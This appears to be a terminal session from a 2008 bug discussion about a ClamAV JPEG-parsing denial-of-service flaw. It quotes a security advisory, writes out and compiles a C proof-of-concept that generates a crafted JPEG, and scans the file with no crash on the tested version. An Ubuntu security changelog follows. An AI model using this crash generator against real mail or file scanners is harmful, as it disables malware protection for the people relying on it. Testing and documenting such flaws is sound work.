test@ubuntu:~$ clamscan -V ClamAV 0.94.1/8713/Tue Dec 2 14:59:31 2008 >From http://securitytracker.com/alerts/2008/Dec/1021296.html: Version(s): prior to 0.94.2 Description: A vulnerability was reported in Clam AntiVirus. A remote user can cause denial of service conditions on the target system. A remote user can create a specially crafted JPEG file that, when processed by the target system, will trigger a stack overflow and cause the Clam AntiVirus process to crash. Ilja van Sprundel reported this vulnerability. Impact: A remote user can create a JPEG file that, when processed by the target application, will cause the target application to crash. Solution: The vendor has issued a fixed version (0.94.2). The vendor's advisory is available at: http://sourceforge.net/project/shownotes.php?group_id=86638&release_id=643134 Also reference @ https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1266 test@ubuntu:~$ cat > clam.c const char crashstr[] = "\xff\xd8" // jpg marker "\xff\xed" // exif data "\x00\x02" // length "Photoshop 3.0\x00" "8BIM" "\x04\x0c" // thumbnail id "\x00" "\x01" "\x01\x01\x01\x01" "0123456789012345678912345678"; // skip over 28 bytes #include #include #include #define NR_ITER 200000 int main() { FILE *fp; int i; fp = fopen("clamav-jpeg-crash.jpg", "w+"); if (!fp) { printf("can't open/create file\n"); exit(0); } for (i = 0; i < NR_ITER; i++) { fwrite(crashstr, sizeof(crashstr)-1/*don't want 0-byte ?*/, 1, fp); } fclose(fp); printf("done, now run clamscan on ./clamav-jpeg-crash.jpg\n"); exit(0); } test@ubuntu:~$ gcc -o clam clam.c test@ubuntu:~$ ./clam done, now run clamscan on ./clamav-jpeg-crash.jpg test@ubuntu:~$ which clamscan /usr/bin/clamscan test@ubuntu:~$ /usr/bin/clamscan ./clamav-jpeg-crash.jpg LibClamAV Warning: *********************************************************** LibClamAV Warning: *** This version of the ClamAV engine is outdated. *** LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq *** LibClamAV Warning: *********************************************************** ./clamav-jpeg-crash.jpg: OK ----------- SCAN SUMMARY ----------- Known viruses: 469917 Engine version: 0.94.1 Scanned directories: 0 Scanned files: 1 Infected files: 0 Data scanned: 11.44 MB Time: 2.238 sec (0 m 2 s) test@ubuntu:~$ As of 12.02.2008: clamav (0.94.dfsg.1-1ubuntu0.1) intrepid-security; urgency=low * SECURITY UPDATE: (LP: #296704) - Fix off-by-one heap overflow * Other changes: - debian/control: Recommends apparmor >= 2.1+1075-0ubuntu6 for clamav-daemon and clamav-freshclam - add debian/usr.bin.freshclam and debian/usr.sbin.clamd - debian/clamav-(daemon|freshclam).dirs: add etc/apparmor.d/force-complain - debian/clamav-(daemon|freshclam).install: install profiles - debian/clamav-(daemon|freshclam).preinst: create symlink for force-complain/ on pre-feisty upgrades, upgrades where apparmor-profiles profile is unchanged (ie non-enforcing) and upgrades where the profile doesn't exist. - debian/clamav-(daemon|freshclam).postrm: remove symlink in force-complain/ on purge. - debian/clamav-(daemon|freshclam).postinst.in: reload apparmor - update README.Debian with note on Apparmor * Update apparmor profile for clamd to work with TCP sockets (LP: #288942) -- Scott Kitterman Wed, 12 Nov 2008 15:20:49 -0500
